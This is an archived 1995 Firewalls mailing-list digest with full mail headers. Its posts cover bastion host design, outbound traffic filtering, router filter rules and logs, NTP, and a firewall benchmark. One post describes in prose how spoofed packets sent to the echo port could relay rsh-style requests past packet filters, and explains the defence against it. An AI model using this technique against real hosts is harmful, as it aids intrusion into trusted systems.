07:04:47 -0700 Received: from maddie.atlantic.com (maddie.atlantic.com [198.252.200.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA19400 for ; Tue, 16 May 1995 07:04:42 -0700 Received: (pokey@localhost) by maddie.atlantic.com (8.6.10/8.6.9) id IAA11688; Tue, 16 May 1995 08:38:19 -0400 From: Rick Romkey Message-Id: <199505161238.IAA11688@maddie.atlantic.com> Subject: Re: WebServers and Firewalls To: billcurr@cyberspace.com (Bill Curr) Date: Tue, 16 May 1995 08:38:19 -0400 (EDT) Cc: Firewalls@GreatCircle.COM In-Reply-To: <9505152359.AA09419@armitage.cyberspace.com> from "Bill Curr" at May 15, 95 04:59:35 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 2103 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > >Boarderware seems decent considering it's turnkey but I worry about > >limitations. Their attitude is "we know best". If I want to run > >Netscapes Server Proxy or some other non-Borderware proxy I can't. > > Excuse my ignorance on firewalls in general, but this leads me to inquire what > is the relationship between a firewall and a web server? I have heard > suggestions to put a web server "in front" and/or "behind" a firewall. By > design, usually web servers are passing out information for every and anybody. > I am looking at getting a web server (NetScape Commerce Server) with the idea > of having some areas "off-limits" to the general public. It would not need > heavy-duty security, more just a password to discourage casual access. But > what if we wanted to have high security, say, having folks access an FTP > library from our homepages? The built in servers that ship with BorderWare (Janus) are touted as secure servers. That may or may not be true of other firewalls. The reason that the Border folks claim their's is secure is because both are stripped down versions (for FTP, it only runs in anonymous mode or requires a challenge/ response. For httpd, it runs a version which only supports the GET method). Both are "chrooted" and have no access to the remaining file systems. The security we are talking about here is not a person managing to get to protected areas of the web or ftp server, but instead the security of someone managing to break into the program and begin hacking the firewall to attempt further breakins to the private network. The security you are talking about is a bit out of the scope of this list...perhaps you should try some of the "Web" discussion groups. -Rick ---------------------------------------------------------------------------- Rick E Romkey | A T L A N T I C | Internet pokey@atlantic.com | Computing Technology Corporation | Specialists (203) 257-7163 | http://www.atlantic.com/ | ----------------------------------------------------------------------------- From firewalls-owner Tue May 16 08:31:58 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA20150 for firewalls-outgoing; Tue, 16 May 1995 07:42:38 -0700 Received: from isis.u-strasbg.fr (isis.u-strasbg.fr [130.79.200.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA20136 for ; Tue, 16 May 1995 07:41:30 -0700 Received: from des3.u-strasbg.fr (des3.u-strasbg.fr [130.79.7.62]) by isis.u-strasbg.fr (8.6.9/8.6.9) with SMTP id QAA08398 for ; Tue, 16 May 1995 16:37:55 +0200 Received: by des3.u-strasbg.fr (4.1/SMI-3.2-jjp/4/6/92) id AA03073; Tue, 16 May 95 16:36:37 +0100 Date: Tue, 16 May 95 16:36:37 +0100 From: detzel@des3.u-strasbg.fr (???) Message-Id: <9505161536.AA03073@des3.u-strasbg.fr> To: firewalls@GreatCircle.COM Subject: Re: Why control outbound traffic / Sharing information among different secured network Cc: detzel@isis.u-strasbg.fr Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From: amolitor@anubis.network.com (Andrew Molitor) > I haven't seen anyone mention it, so I will. Certain classes of >attacks involve doing various things to get some code running on an internal >host which constructs things which either are or which look like outbound >connections. Remember the 'get INN or cnews to run arbitrary code' thing? Sorry, but as a novice in Firewall I can't see what you mean by 'get INN or cnews to run arbitrary code' ? According to what I read up to now, there's NO CONCRET raison to fear outbound connexion, right ? The only warning is: >In practice, it all comes down to corporate policy. If the internal >network contains information that is to be protected from release to >the public (i.e. the Internet) then "unrestricted" access is clearly a >bad thing. It could be a threat only if users inside the secured network creat outbound traffic which involved secret informations (through ftp for example or sending personal mail) And what about mounting file system ? We are about to build a Firewall but it'll pretty hard (I think) to handle sharing information between networks: few of our users have some accounts on different secure/unsecure system. Up to now they've mounted their directories through NFS, which won't be available through our Firewall. Any idea concerning secure information sharing ? Thanks in advance -vincent From firewalls-owner Tue May 16 09:02:06 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA21234 for firewalls-outgoing; Tue, 16 May 1995 08:51:05 -0700 Received: from inesc.inesc.pt (inesc.inesc.pt [146.193.0.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA21207 for ; Tue, 16 May 1995 08:50:53 -0700 Received: from ccae-sv.inesc.pt by inesc.inesc.pt with SMTP; id AA11557 (/); Tue, 16 May 1995 17:47:06 +0200 Received: from beatle by ccae-sv.inesc.pt (4.1/SunOS4.1.3) id AA25831; Tue, 16 May 95 17:50:15 +0200 Message-Id: <9505161550.AA25831@ccae-sv.inesc.pt> Comments: Authenticated sender is From: "Ricardo Pereira" To: firewalls@GreatCircle.com Date: Tue, 16 May 1995 17:48:31 +0000 Subject: A better syslogd ? Priority: normal X-Mailer: Pegasus Mail for Windows (v2.0-WB3) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone know about an implementation of a better syslog daemon ? For better I mean more flexibility in the rules. I know TIS syslogd, and it does add two "add-on"s : The regular expression filters, and the possibility to execute programs upon receive of certain logs. This is useful, but regexps may be a bit "heavier" than I would need. This is what I would consider nice... -Interpret facility and level as simple integers, not tied to some definitions, and do filtering based on them. "standard" syslogd imposes a limited number of facilities, and filtering is based on "level higher than"... -A more complete management of log files. This has been largely discussed in fwtk mailing list, and I understand how to do it., but it would be nice if it could be integrated with the daemon itself. I looked at the sources of syslogd and they seem simple enough to modify, but I would like to collect some opinions regarding: - Different versions of syslogd - What facilities should an improved syslod implement - Any other thing related to this In order to keep the list members happy, I suggest you reply to me directly and based on the information I get, I will post some conclusions later. Thanks... __________________________________________________________________ Ricardo Jorge Pereira Network Consultant Centro de Comunicacoes em Ambientes Empresariais Av. Duque d'Avila 23, Apartado 10105, 1017 Lisboa Codex, Portugal Telef : +351 1 3100069 Fax : +351 1 3100068 email : ricardo.pereira@inesc.pt ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Microsoft is not the answer, Microsoft is the question. No is the answer. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From firewalls-owner Tue May 16 09:36:29 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA21193 for firewalls-outgoing; Tue, 16 May 1995 08:50:32 -0700 Received: from gateway.sctc.com (GATEWAY.SCTC.COM [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA21187 for ; Tue, 16 May 1995 08:50:25 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id KAA13170 for ; Tue, 16 May 1995 10:54:10 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 226670000; 16 May 95 11:50 CDT Received: from sctc.com by sccmailhost.sctc.com id 144920000; 16 May 95 11:49 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.9) with ESMTP id KAA16819; Tue, 16 May 1995 10:49:42 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id KAA24388; Tue, 16 May 1995 10:49:40 -0500 Date: Tue, 16 May 1995 10:49:40 -0500 From: Rick Smith Message-Id: <199505161549.KAA24388@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Monitoring outgoing traffic Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I wrote: >>At the very least, a responsible organization will monitor outgoing traffic >> in some fashion to provide confidence that people comply with information >>protection policies. David M Funk replied: >Our organization has propritary information that is not releasable to the >public. This information resides in desks and computers. We do not monitor >the briefcases and pockets of employees leaving the building. Are you >saying that this is not a responsible organization. I think not I don't generally think of my pocket or briefcase as being a forum for the "public release" of information. The Internet is. Besides, computers and people have different trust properties. How often do you stick a sensitive document in a briefcase or pocket by accident? Rarely, I expect. But even if you did, you still had *lots* of opportunities to discover the error and then protect the document from compromise. (thanks, Beede) On the other hand, a couple of simple mistakes can transmit almost any information to the Internet, and even publish it where adversaries will see it. Clever adversaries might even manage to fool your computers into transmitting sensitive data. And once it's past the firewall there's no way you can reliably detect and un-do the mistake before it appears in the news. I don't know of any way to monitor traffic automatically and block bad messages with 100% reliability. But some simple checks will catch large classes of mistakes and bunglers, which is a real improvement. Rick. smith@sctc.com roseville, minnesota From firewalls-owner Tue May 16 09:56:33 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA21047 for firewalls-outgoing; Tue, 16 May 1995 08:40:38 -0700 Received: from software.net (www2.software.net [204.69.144.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA21042 for ; Tue, 16 May 1995 08:40:32 -0700 Received: (jpp@localhost) by software.net (8.6.10/3.2W4) id IAA26589; Tue, 16 May 1995 08:40:47 -0700 Date: Tue, 16 May 1995 08:40:43 +0100 From: John Pettitt Subject: Livingston filter trouble take II To: Firewalls@GreatCircle.COM Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Here is some more info on the question I posted yesterday about seeing inside sourced packets ont the outside interface. The outside lan is 198.67.38.00 (it's an ether belonging to internex) inside is 204.69.144.0. I'm seeing packets with inside "from addresses" on the outside interface. Here is a my filter table 1 deny 204.69.144.0/24 0.0.0.0/0 ip log 2 permit 0.0.0.0/0 204.69.144.0/24 tcp estab 3 permit 0.0.0.0/0 204.69.144.1/32 tcp dst eq 25 log 4 permit 0.0.0.0/0 204.69.144.2/32 tcp dst eq 25 log 5 permit 0.0.0.0/0 204.69.144.1/32 tcp dst eq 80 6 permit 0.0.0.0/0 204.69.144.1/32 tcp dst eq 443 [other rules deleted for security reasons] 28 deny 0.0.0.0/0 0.0.0.0/0 ip log Mostly my log entries are denys from rule 28 to stuff I don't allow like ftp. However I see some rule 1 denys (see below for some examples) May 3 16:06:43 firebreak.software.net 1 deny: TCP from 204.69.144.1.443 to 129.4.31.133.1713 seq 3A857AE9, ack 0x356A4C56, win 4096, FIN PUSH ACK , 43 bytes May 4 08:38:16 firebreak.software.net 1 deny: TCP from 204.69.144.1.443 to 128.186.52.15.1681 seq 26D18730, ack 0x39B4A371, win 4096, ACK , 512 bytes May 4 20:18:31 firebreak.software.net 1 deny: icmp from 204.69.144.2 to 165.247.46.5 type Echo Reply May 5 09:25:52 firebreak.software.net 1 deny: TCP from 204.69.144.1.443 to 139.78.228.118.1095 seq 1BF356E6, ack 0x78F66, win 4096, FIN PUSH ACK , 242 bytes May 7 15:46:41 firebreak.software.net 1 deny: TCP from 204.69.144.1.443 to 198.69.200.107.1426 seq 66C0B001, ack 0x4B19C2BF, win 4096, PUSH ACK , 29 bytes May 8 22:17:35 firebreak.software.net 1 deny: TCP from 204.69.144.1.443 to 137.192.199.113.1810 seq 6DB612BB, ack 0x5188A270, win 4096, ACK , 512 bytes May 9 06:47:10 firebreak.software.net 1 deny: TCP from 204.69.144.1.443 to 199.166.232.82.1188 seq 727CA502, ack 0x53B155F5, win 4096, FIN PUSH ACK , 228 bytes I have ruled out another path to the outside. Am I under attack or is there a bug? Regards Perplexed in menlo park. John Pettitt jpp@software.net VP Engineering +1 415 473 3065 (V) CyberSource Corporation +1 415 473 3066 (F) From firewalls-owner Tue May 16 10:31:27 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA23108 for firewalls-outgoing; Tue, 16 May 1995 10:10:26 -0700 Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA23103 for ; Tue, 16 May 1995 10:10:23 -0700 Received: from cixgate by relay2.UU.NET with SMTP id QQypzo26268; Tue, 16 May 1995 13:10:04 -0400 Received: from Jims_pc.3com.com ([152.67.56.22]) by cixgate (4.1/SMI-4.1/3com-cixgate-GCA-931027-01) id AA11726; Tue, 16 May 95 17:16:03 GMT Date: Tue, 16 May 95 17:16:02 GMT Message-Id: <9505161716.AA11726@cixgate> X-Sender: Jim_Sanchez@192.156.136.10 (Unverified) X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: Jim_Sanchez@3mail.3Com.COM (Jim Sanchez) Subject: Information on Proxy Servers Wanted Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have a number of customers who want to get internet connectivity from their existing (non-registered) network. Some of them have an old class C address and their actual address has grown much beyond what that will accomodate. The customers are typically PC, MAC, and Unix users so any solutions would need to support this kind of base. A piece of dedicated hardware would be provided to for the proxy server. Please respond directly since I do not subscribe to this list. Thanks Jim Jim Sanchez, Network Consultant 3Com Corporation Bellevue, Washington (206)455-8530 (work) (206)836-0105 (Home) From firewalls-owner Tue May 16 11:00:09 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA23523 for firewalls-outgoing; Tue, 16 May 1995 10:25:49 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA23518 for ; Tue, 16 May 1995 10:25:43 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA16669; Tue, 16 May 95 13:10:21 -0400 Date: Tue, 16 May 95 13:10:21 -0400 Message-Id: <9505161710.AA16669@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Re: Why control outbound information Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Vincent rites: >According to what I read up to now, there's NO CONCRET raison to fear >outbound connexion, right ? Look at it as "belt and suspenders". Certainly if you have a perfect inbound filter and all of the people on the inside are completely trustworthy, you need have no fear. However... Consider that both the Rahul attack of a year ago, the more recent Mitnick attack, and at least one other major incident involved placing an unauthorized process on an inside machine and using it to pass information to the outside. While a really, *really* good filter might have stopped them from getting in, all it takes is one modem/outsourced janitor/unreleased CERT discovery/awsh*t to put an outgoing process on a machine. Single-fail.die.die.die is not a good philosophy if you really need a firewall in the first place. IMNSHO an installation with a wall should be at least single-fail-operational/ dual-fail-safe and an outgoing filter is a good place to have a block. Warmly, Padgett From firewalls-owner Tue May 16 11:06:10 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA24357 for firewalls-outgoing; Tue, 16 May 1995 10:53:54 -0700 Received: from disperse.demon.co.uk (disperse.demon.co.uk [158.152.1.77]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA24351 for ; Tue, 16 May 1995 10:53:47 -0700 Received: from post.demon.co.uk by disperse.demon.co.uk id aa12409; 16 May 95 18:18 GMT-60:00 Received: from haddock.demon.co.uk by post.demon.co.uk id ac29096; 16 May 95 18:18 GMT-60:00 Date: Tue, 16 May 1995 15:22:09 GMT From: Dave Roberts Message-Id: <3007@saa-cons.co.uk> To: firewalls@greatcircle.com Subject: 1, Bastion host configuration Lines: 33 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am about to embark on setting up a firewall. I have read "The Book" and waded through this list for a couple of months, and have a question about configuring up the bastion host. In "The Book", the bastion host runs a minimal set of programs and effectively allows the internal net to connect to the Internet (without going into all the necessary restrictions). Before I picked the book up, and subscribed to this list, I had an idea of having the machine allow a selected number of users onto it, and pass the requests out that way. This, to me, had the advantage of limiting even further the exposure of the internal network, upon which there may be unsecure machines. It would only need to pass back packets for telnet, and service X requests. I appreciate that more users = more accounts to crack and therefore a greater risk of exposure due to poor passwords, but is the "C&B" method that much secure that it outweighs any advantages of "my" method, if indeed you feel my method *has* any advantages. At the end of the day I want to provide net access to a few selected "trustable" users, and protect a network of unsecure machines with users who don't believe in security internally. I'd rather not get into issues of setting up a security policy chastising users for having poorly configured hosts (a lot of PC's running some form of Unix). Also: I don't think that my budget is gonna be vast, so I think 2 machines might be out of the question. How about using C&B plan A, (P87) with an extra router on the inside connection:- Internal +--------+ +--------------+ +--------+ Internet ----+ Router +------+ Gateway +-----+ Router +---- Network +--------+ +--------------+ +--------+ So, it's sort of a Plan C, without the internal gateway. Please tear this to shreds. All replies would be most welcome. - Dave -------------------+------------------------------------------------------- Dave Roberts | Don't `surf the net', it's sad. Get a board and surf djr@saa-cons.co.uk | the break. "I feel better than James Brown" From firewalls-owner Tue May 16 12:08:55 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA25348 for firewalls-outgoing; Tue, 16 May 1995 11:39:42 -0700 Received: from brimstone.soscorp.com (soscorp.soscorp.com [204.52.248.130]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA25343 for ; Tue, 16 May 1995 11:39:35 -0700 Received: from fearless.soscorp.com (fearless.soscorp.com [204.52.249.130]) by brimstone.soscorp.com ($Revision: 2.21 $/8.6.12/8.6.4.287) with BSMTP id BS0024087/OAA24088; Tue, 16 May 1995 14:39:16 -0400 Received: (ari@localhost) by fearless.soscorp.com (8.6.10/8.6.4.287) id OAA13270; Tue, 16 May 1995 14:38:22 -0400 Date: Tue, 16 May 1995 14:38:22 -0400 From: ari@soscorp.com (Ari Shamash) Message-Id: <199505161838.OAA13270@fearless.soscorp.com> To: Scott Barman Cc: firewalls@GreatCircle.COM Subject: Requesting "echo" In-Reply-To: References: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>>>> On Thu, 11 May 1995 14:20:20 -0400 (EDT), Scott Barman said: Scott> Why not use echo (port 7) or chargen (19) to see if one Scott> could get a response out of a system? I can see using Scott> it when there may be a likelihood that I may not get a Scott> response from the ping. Not blocking the echo port (port 7) or somehow preventing packets with spoofed IP addresses from entering the system could be even more disasterous to a site. Consider this scenario: A packet enters the network with a spoofed IP address (say of the backup server), with source port 514 (port for remote shell), and the payload consisting of a valid RSH-type "header" and content. This packet then gets echoed back to the backup server with the IP source address of the client. If the server trusts this host (and most backup hosts must, so remote dumps can happen), then what? Clearly, blocking packets with internal source IP addrs at the outside boundry defeats this kind of attack (as well as other attacks based on source IP addrs), but this does show that the echo service can be used to bypass packet filters. Ari Shamash SOS Corporation From firewalls-owner Tue May 16 12:32:25 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA25763 for firewalls-outgoing; Tue, 16 May 1995 12:06:04 -0700 Received: from tserver.dsac.dla.mil (tserver.dsac.dla.mil [131.78.6.153]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA25752 for ; Tue, 16 May 1995 12:05:58 -0700 Received: by tserver.dsac.dla.mil (5.65/1.35) id AA06497; Tue, 16 May 95 15:04:59 -0400 From: nto2584@tserver.dsac.dla.mil (Steven Payne) Message-Id: <9505161904.AA06497@tserver.dsac.dla.mil> Subject: Re: NTP on a bastion system To: mjr@tis.com (Marcus J. Ranum) Date: Tue, 16 May 1995 15:04:59 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <3920.9505161300@illuminati> from "Marcus J. Ranum" at May 16, 95 09:00:36 am X-Mailer: ELM [version 2.4 PL21] Content-Type: text Content-Length: 1145 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > >Has anynone knowed and experienced about some tools that > >relay traffic back and forth between two NTP servers. > >They must run on a bastion system (FWTK,SunOS4.1.4). > > Ntpd is pretty good for the job. :) > > Firewalls make good network clocks, especially if you have > more than one of them. Just have the firewall sync with a timesource > outside, and have inside systems get clocking from the firewall and > spread it internally. > > mjr. > We are using the xntpd among the two hosts on our class C with the firewall acting as a server to both hostsi, the router allows the firewall access to our class C net, so we needed to use the firewall as a server. The firewall itself is using the kerberos master server as the xntpd master server. It is absolutely essential for the system clocks to be in sync for kerberos to operate. If not then the tickets issued will be out of sync and not operate or better yet expire (at least for 5 minute root instance tickets). Marcus is right they make good clocks. We are using the xntpd in just the fashion that marcus describes. steve payne spayne@dsac.dla.mil comm 614-692-9991 From firewalls-owner Tue May 16 12:50:25 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA25593 for firewalls-outgoing; Tue, 16 May 1995 11:59:55 -0700 Received: from tserver.dsac.dla.mil (tserver.dsac.dla.mil [131.78.6.153]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA25588 for ; Tue, 16 May 1995 11:59:44 -0700 Received: by tserver.dsac.dla.mil (5.65/1.35) id AA06462; Tue, 16 May 95 14:59:31 -0400 From: nto2584@tserver.dsac.dla.mil (Steven Payne) Message-Id: <9505161859.AA06462@tserver.dsac.dla.mil> Subject: Firewall performance from neal nelson RTE To: firewalls@greatcircle.com Date: Tue, 16 May 1995 14:59:30 -0400 (EDT) X-Mailer: ELM [version 2.4 PL21] Content-Type: text Content-Length: 4939 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I promised the report from the neal nelson rte to the group when we had stats available. We had the performance measurement group run the benchmarks on our firewall and here's what we got. I will first describe out 486 configuration. 486 DX 33 12 meg of ram, trident VLB VGA 1meg card 1 340 meg IDE hard drive. One 3.5 floppy. NO level 2 cache. Subject: Firewall stress test An RTE was run to do the maximum number of rlogins and ftp concurrent users to host_A, host_B, and host_C systems. The user mix was 14 ftp users seven to the host_B system and seven to host_A system and 51 rlogin users, 27 to the host_B system 10 to host_A, 14 to host_C. The host_B and host_A were max'ed but the gatekeeper system was not max'ed until the 14 rlogin users were added to host_C. In this concurrent users test the gatekeeper prompt was not reached with 70 users. One or two users can squeeze in above 65 users depending on how busy the LAN was (day time vs evening). The test ran successfully in 9 minutes with 4 minutes included for user synchronization. The manual rlogin to host_C took 47 seconds to complete during the test, the rte response time average for the rlogins was 40 seconds a 43% degradation when compared with non-concurrent user test. The firewall performance degrades abruptly as the number of users increases over 65 even with the maxuser parameter on the gatekeeper being up'ed to 129. The number of none concurrent users was 300 rlogin and 120 ftp users taking 80 minutes to complete successfully with response time for ftp is 28 seconds and 28 seconds for rlogin. Summary: The firewall can accommodate 65 concurrent users with response time of 40 seconds per rlogin, and 420 non-concurrent users over 80 minutes with response time of 28 seconds per rlogin. N. Nelson & Assoc. Summary Users Within Script-Interval Time 15:33 Date 05/15/95 Program k1bn73 Concurrent users Firewall stress test Page 1 Script- Active No. of Avg for Interval Description Users Samples 1 user 7-1 Rlogin to the host_B system 65 27 125.59 8-1 Ftp to the host_B system 65 7 134.25 9-1 Rlogin to the host_A system 65 10 72.75 10-1 Ftp to the host_A system 65 7 46.60 11-1 Rlogin to the host_C system 65 14 40.85 N Nelson & Assoc. Summary Users Within Script-Interval 07:31:48 Date 05/16/95 Program k1bn73 Non-concurrent users Firewall stress test Page 1 Script- Active No. of Avg for Interval Description Users Samples 1 User 3-1 Rlogin to the host_B system 4 150 23.23 4-1 Ftp to the host_B system 4 60 31.97 5-1 Rlogin to the host_A system 4 150 32.00 6-1 Ftp to the host_A system 4 60 23.35 The size of each ftp was 237,568 bytes. host_A is a 486 running SCO ODT 3.0 host_B is a 486 running BSDI version 2 host_C is a 700 series HP running HP-UX vers 9.04 The Firewall is running BSDI with a trimmed down kernel, with most of the unused drivers removed from the kernel. I was going to post the configuration of the kernel but I am not sure that's a good idea as it might show where we are vulnerable if I did not remove a certain module. Is this wise or should I show it to you? The configuration of the firewall is configured as a screened_host_gateway. We have a separate class C segment off of our class B net. The router is setup to route from the class B to C unhampered traffic, all traffic going through the router is by the firewall proxies. Also host_A and host_B are on the class C, host_C is on the class B. (I hope I didn't lose anybody here). One more issue, the router we are using is only configured with 1 meg of memory, and it is an ancient AGS cisco. So this could be a bottleneck but not to much extent because host_C traffic did not go through the router, just through the firewall. The only tuning I did was to tune the MAXUSERS to 129 because the tuning on BSDI works like this if MAXUSERS < 64 set clusters equal to some_size if MAXUSERS >= 64 clusters less than 128 set bufs equal to some_size_bigger if MAXUSERS > 128 set clusters equal to some_size_even_bigger So I chose to use MAXUSERS to 129 to use the bigger kernel clusters. We feel that with the addition of level 2 cache (256K) that these mesurements will go up. When we receive the cache we will re-run these benchmarks. steve payne spayne@dsac.dla.mil comm 614-692-9991 From firewalls-owner Tue May 16 14:01:38 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA27837 for firewalls-outgoing; Tue, 16 May 1995 13:32:49 -0700 Received: from linux (nall.zilker.net [198.252.182.38]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA27830 for ; Tue, 16 May 1995 13:32:45 -0700 Received: from [192.168.1.3] by linux with smtp (Smail3.1.28.1 #64) id m0sBTHE-000GZnC; Tue, 16 May 95 16:31 EDT X-Sender: nall@linux Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 16 May 1995 15:31:01 -0600 To: firewalls@GreatCircle.COM From: nall@zilker.net (Joe Nall) Subject: Re: Firewall performance from neal nelson RTE Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >I promised the report from the neal nelson rte to the group >when we had stats available. We had the performance measurement >group run the benchmarks on our firewall and here's what we got. ... >The firewall can accommodate 65 concurrent users with response time of 40 >seconds per rlogin, and 420 non-concurrent users over 80 minutes with response >time of 28 seconds per rlogin. Is that the firewall limit or the limit of the hosts you are logining into? Don't you need a test without the firewall to determine the firewall's impact? Still curious, joe nall - nall@nosc.mil, nall@zilker.net From firewalls-owner Tue May 16 14:31:31 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA28810 for firewalls-outgoing; Tue, 16 May 1995 14:29:28 -0700 Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA28803 for ; Tue, 16 May 1995 14:29:24 -0700 Received: from uranus ([13.242.56.22]) by alpha.xerox.com with SMTP id <14479(4)>; Tue, 16 May 1995 14:28:54 PDT Received: from altar by uranus (4.1/{XSoftHUB-1.2}SMI-4.1) id AA06711; Tue, 16 May 95 14:28:45 PDT Received: by altar (4.1/{XSoft-U1-1.0}SMI-4.1) id AA03515; Tue, 16 May 95 14:28:36 PDT Date: Tue, 16 May 1995 14:28:36 PDT From: meza@xsoft.xerox.com (Jose' M. Salas-Meza) Message-Id: <9505162128.AA03515@altar> To: firewalls@greatcircle.com Subject: Are there any Free SLIP Software packages available for SunOS4.1.3_u1? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I'm looking to test out some free SLIP software packages on my 4.1.3_u1 Sun Sparc IPX System. The problem is that I don't have any. So can anyone point me to locations where I can pick some up from? Also, Are there any good ones out there? Are there any ones that I should avoid? Thanks, Jose' M. Salas-Meza ------------------------------------------------------------ meza@xsoft.xerox.com Xerox - XSoft (Palo Alto CA) From firewalls-owner Tue May 16 15:32:12 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA29477 for firewalls-outgoing; Tue, 16 May 1995 15:08:12 -0700 Received: from icicle.winternet.com (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA29472 for ; Tue, 16 May 1995 15:08:08 -0700 Received: from klondike by icicle.winternet.com with smtp (SunOS Smail3.1.28.1 #5) id m0sBUmL-000SxCC; Tue, 16 May 95 17:07 CDT Received: (from dufresne@localhost) by klondike (8.6.12/8.6.12) id RAA02200; Tue, 16 May 1995 17:07:49 -0500 Posted-Date: Tue, 16 May 1995 17:07:49 -0500 Date: Tue, 16 May 1995 17:07:48 -0500 (CDT) From: Ron DuFresne To: Rick Smith cc: firewalls@greatcircle.com, smith@sctc.com Subject: Re: Monitoring outgoing traffic In-Reply-To: <199505161549.KAA24388@shade.sctc.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 16 May 1995, Rick Smith wrote: > I wrote: > > >>At the very least, a responsible organization will monitor outgoing traffic > >> in some fashion to provide confidence that people comply with information > >>protection policies. > > David M Funk replied: > > >Our organization has propritary information that is not releasable to the > >public. This information resides in desks and computers. We do not monitor > >the briefcases and pockets of employees leaving the building. Are you > >saying that this is not a responsible organization. I think not > > I don't generally think of my pocket or briefcase as being a forum > for the "public release" of information. The Internet is. > > Besides, computers and people have different trust properties. > > How often do you stick a sensitive document in a briefcase or pocket > by accident? Rarely, I expect. But even if you did, you still had > *lots* of opportunities to discover the error and then protect the > document from compromise. (thanks, Beede) > > On the other hand, a couple of simple mistakes can transmit almost any > information to the Internet, and even publish it where adversaries > will see it. Clever adversaries might even manage to fool your > computers into transmitting sensitive data. And once it's past the > firewall there's no way you can reliably detect and un-do the mistake > before it appears in the news. > > I don't know of any way to monitor traffic automatically and block bad > messages with 100% reliability. But some simple checks will catch > large classes of mistakes and bunglers, which is a real improvement. > It seems to me that mistakes and bungles are a sign of poor user training. Even the defense related corproations I have worked at, who often have a need to share sensitive information with contracting partners and various military sites across the US and abroad. A company ploicy that outlines how sensitive data is to be transmitted, good user training, and a strongly skilled user help desk/support department are the keys to keeping sensitive data out of the hands of those it is ment not for...not a 'big-brother' mentality. Later, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Tue May 16 16:01:38 1995 